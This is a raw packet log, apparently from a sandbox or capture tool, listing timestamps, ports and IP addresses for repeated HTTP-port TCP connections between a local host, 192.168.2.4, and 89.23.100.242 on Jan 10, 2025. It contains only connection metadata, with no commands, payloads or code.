                                                                                                Jan 10, 2025 07:58:50.231399059 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.341836929 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.346837997 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.346906900 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.347024918 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.351917028 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.579921007 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.585321903 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.585361958 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.704745054 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.709893942 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.709975004 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.709989071 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.990257025 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.032881975 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.084093094 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.126512051 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.142091990 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.189024925 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.212939978 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.267133951 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.329315901 CET5009580192.168.2.489.23.100.242
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 10, 2025 07:58:51.329369068 CET  50096        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.330323935 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.336044073 CET  80           50095      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.336124897 CET  50095        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.336308002 CET  80           50096      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.336350918 CET  50096        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.336811066 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.336874008 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.336992979 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.343544006 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.689127922 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:51.694142103 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.694159031 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:51.694174051 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.103879929 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.157773018 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.291888952 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.345261097 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.420583010 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.421906948 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.425795078 CET  80           50097      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.425862074 CET  50097        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.426755905 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.426811934 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.427025080 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.431756020 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.782845974 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:52.788069010 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.788110018 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:52.788136959 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.275991917 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.329639912 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.427634954 CET  80           50098      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.470264912 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.544688940 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.549768925 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.549889088 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.549983978 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.554897070 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.907850027 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:53.912977934 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.913007975 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:53.913041115 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.290642977 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.345268965 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.429718971 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.432223082 CET  50098        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.470276117 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.543329954 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.543394089 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.548341990 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.548453093 CET  80           50099      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.548456907 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.548501015 CET  50099        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.548875093 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.553721905 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.907955885 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:54.913060904 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.913094044 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:54.913125038 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.302866936 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.360904932 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.441432953 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.485954046 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.558249950 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.558494091 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.563420057 CET  80           50100      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.563462019 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.563517094 CET  50100        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.563548088 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.563723087 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.568612099 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.907960892 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:55.913141012 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.913177967 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:55.913229942 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.158677101 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.158852100 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.163821936 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.163933039 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.164052963 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.164061069 CET  80           50101      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.164124012 CET  50101        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.168956041 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.279071093 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.284168959 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.284251928 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.284343958 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.289324999 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.517317057 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.522442102 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.522459984 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.642354965 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:56.647399902 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.647413015 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:56.647427082 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.028199911 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.079829931 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.157007933 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.204654932 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.281116962 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.281415939 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.281692028 CET  49900        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.281749010 CET  49938        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.286271095 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.286320925 CET  80           50103      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.286382914 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.286402941 CET  50103        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.286503077 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.291290998 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.642225981 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:57.647258997 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.647278070 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:57.647293091 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.039999008 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.079652071 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.163172960 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.163434982 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.168380022 CET  80           50104      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.168406010 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.168445110 CET  50104        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.168484926 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.168611050 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.173316956 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.517280102 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:58.522403955 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.522478104 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.522510052 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.905781031 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:58.954727888 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.040857077 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.095330954 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.170887947 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.171232939 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.176160097 CET  80           50105      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.176208973 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.176282883 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.176376104 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.176410913 CET  50105        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.181308985 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.533035994 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:59.538130999 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.538208008 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.538259029 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.940201998 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.979629040 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:59.985922098 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.032886028 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.072932005 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.126540899 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.130094051 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.173438072 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.279355049 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.279508114 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.279814005 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.284616947 CET  80           50102      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.284790993 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.284859896 CET  50102        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.284879923 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.284905910 CET  80           50106      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.284984112 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.285015106 CET  50106        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.289792061 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.645905972 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:00.651010990 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.651031971 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:00.651043892 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.049196959 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.095273972 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.204114914 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.251072884 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.337203979 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.337563992 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.342495918 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.342533112 CET  80           50107      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.342564106 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.342581034 CET  50107        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.342729092 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.347520113 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.689182043 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:01.694370985 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.694406986 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:01.694439888 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.188221931 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.314146996 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.320224047 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.493223906 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.493262053 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.498214006 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.498231888 CET  80           50108      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.498286009 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.498305082 CET  50108        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.498435020 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.503253937 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.845398903 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:02.850521088 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.850583076 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:02.850611925 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.245507002 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.392273903 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.398781061 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.511269093 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.511287928 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.516601086 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.516647100 CET  80           50109      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.516675949 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.516702890 CET  50109        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.516794920 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.521608114 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.861011028 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:03.866204023 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.866241932 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:03.866274118 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:04.257208109 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:04.385835886 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:04.386085987 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:04.520895958 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:04.521223068 CET  50111        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:04.526262999 CET  80           50111      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:04.526304007 CET  80           50110      89.23.100.242  192.168.2.4
Jan 10, 2025 07:59:04.526330948 CET  50111        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:04.526357889 CET  50110        80         192.168.2.4    89.23.100.242
Jan 10, 2025 07:59:04.526473999 CET  50111        80         192.168.2.4    89.23.100.242
                                                                                                Jan 10, 2025 07:59:04.531358004 CET805011189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:04.876863956 CET5011180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:04.881952047 CET805011189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:04.881969929 CET805011189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:04.881983995 CET805011189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.080344915 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.080396891 CET5011180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.085594893 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.085685015 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.085773945 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.085796118 CET805011189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.085850000 CET5011180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.090656042 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.200865030 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.206183910 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.207129955 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.207210064 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.212066889 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.439104080 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.444179058 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.444406986 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.564120054 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:05.569313049 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.569351912 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.569384098 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.829966068 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.944292068 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.958870888 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:05.959208012 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.073045015 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.075212002 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.199572086 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.199630976 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.200108051 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.204931974 CET805011289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.204999924 CET5011280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.205001116 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.205056906 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.205147982 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.205411911 CET805011389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.205468893 CET5011380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.210062027 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.564106941 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:06.569307089 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.569325924 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.569339991 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:06.958594084 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.079787016 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.092672110 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.189270973 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.215678930 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.215780973 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.220849037 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.220890045 CET805011489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.220942020 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.220969915 CET5011480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.221076965 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.225990057 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.579878092 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:07.585073948 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.585117102 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.585146904 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:07.964337111 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.017168045 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.122549057 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.204672098 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.248593092 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.248939991 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.253521919 CET805011589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.253561974 CET5011580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.253711939 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.253763914 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.253855944 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.258709908 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.611063004 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:08.616118908 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.616136074 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:08.616149902 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.103215933 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.157788992 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.232789040 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.282790899 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.361340046 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.361706972 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.366338015 CET805011689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.366388083 CET5011680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.366535902 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.366589069 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.366720915 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.371450901 CET805011789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:59:09.720398903 CET5011780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:59:09.725667000 CET805011789.23.100.242192.168.2.4
